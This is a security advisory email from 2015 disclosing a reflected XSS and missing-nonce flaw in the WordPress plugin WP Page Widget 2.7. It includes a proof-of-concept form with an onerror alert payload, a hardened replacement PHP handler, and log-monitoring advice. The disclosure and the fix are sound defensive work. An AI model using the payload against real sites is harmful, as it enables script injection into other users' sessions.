Subject: Cross-Site Scripting (XSS) in WP Page Widget 2.7
Date: Tue, 25 Aug 2015 11:40:38 +0200

Hello,

Plugin: WP Page Widget 2.7 https://wordpress.org/plugins/wp-page-widget/

1. Reflected Cross-Site Scripting (XSS)

Any authenticated user (even a subscriber) can inject HTML/JS through this endpoint; the request carries no CSRF protection (no nonce check), and the parameter is reflected into the response without output encoding.

Method: POST
URL: http://localhost/wp-admin/admin-ajax.php?action=pw-get-taxonomy-widget
Vulnerable parameter: taxonomy

Example PHP call stack:
pw_returnTaxonomyWidget   [/wp-page-widget/wp-page-widgets.php:862]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=pw-get-taxonomy-widget">
<input type="text" name="taxonomy" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--
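For comparison, here is what a hardened admin-ajax handler for this kind of action looks like. This is an added example written for this note, not the plugin's own code; the action name `pw-get-taxonomy-widget` and the `taxonomy` parameter come from the report above, while the function name, the nonce action `pw_widget`, the `nonce` field name and the capability `edit_theme_options` are assumptions. It relies only on standard WordPress runtime functions.

```php
<?php
// Added example: a hardened admin-ajax callback for the
// 'pw-get-taxonomy-widget' action. NOT the plugin's original code.
// Assumes the WordPress runtime (check_ajax_referer, current_user_can,
// sanitize_key, taxonomy_exists, get_taxonomy, esc_attr, esc_html, wp_die).

add_action( 'wp_ajax_pw-get-taxonomy-widget', 'hardened_pw_return_taxonomy_widget' );

function hardened_pw_return_taxonomy_widget() {
    // 1. CSRF: the request must carry a nonce tied to this user and action.
    //    The admin page would emit it with wp_create_nonce( 'pw_widget' ) and
    //    post it in the 'nonce' field (both names are hypothetical).
    //    check_ajax_referer() dies with HTTP 403 when the nonce is missing or bad.
    check_ajax_referer( 'pw_widget', 'nonce' );

    // 2. Authorization: a subscriber should not be able to reach a
    //    widget-editing endpoint at all, regardless of the nonce.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_die( '', '', array( 'response' => 403 ) );
    }

    // 3. Input validation: normalise the value and allow-list it against
    //    taxonomies actually registered on this site, instead of echoing
    //    whatever string the client posted.
    $taxonomy = isset( $_POST['taxonomy'] )
        ? sanitize_key( wp_unslash( $_POST['taxonomy'] ) )
        : '';
    if ( '' === $taxonomy || ! taxonomy_exists( $taxonomy ) ) {
        wp_die( '', '', array( 'response' => 400 ) );
    }
    $tax_obj = get_taxonomy( $taxonomy );

    // 4. Output encoding: escape for the exact context each value lands in
    //    (attribute vs. element body). Even a validated value is escaped,
    //    so a future change to step 3 cannot silently reopen the XSS.
    printf(
        '<div class="pw-taxonomy-widget" data-taxonomy="%s"><h4>%s</h4></div>',
        esc_attr( $taxonomy ),
        esc_html( $tax_obj->labels->name )
    );

    // admin-ajax callbacks must terminate explicitly.
    wp_die();
}
```

Each of the four steps closes one of the gaps described in the report: the nonce check removes the CSRF vector, the capability check keeps subscribers off the endpoint, the allow-list rejects arbitrary input, and the context-aware escaping means the `"><img ...>` payload from the verification form is rendered as inert text rather than markup. On the monitoring side, POST requests to `admin-ajax.php` with `action=pw-get-taxonomy-widget` from low-privileged accounts, or with a `taxonomy` value that is not a registered taxonomy name, are the signal to look for in web server logs while the plugin remains unpatched.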

--
Regards,
Marcin Probola,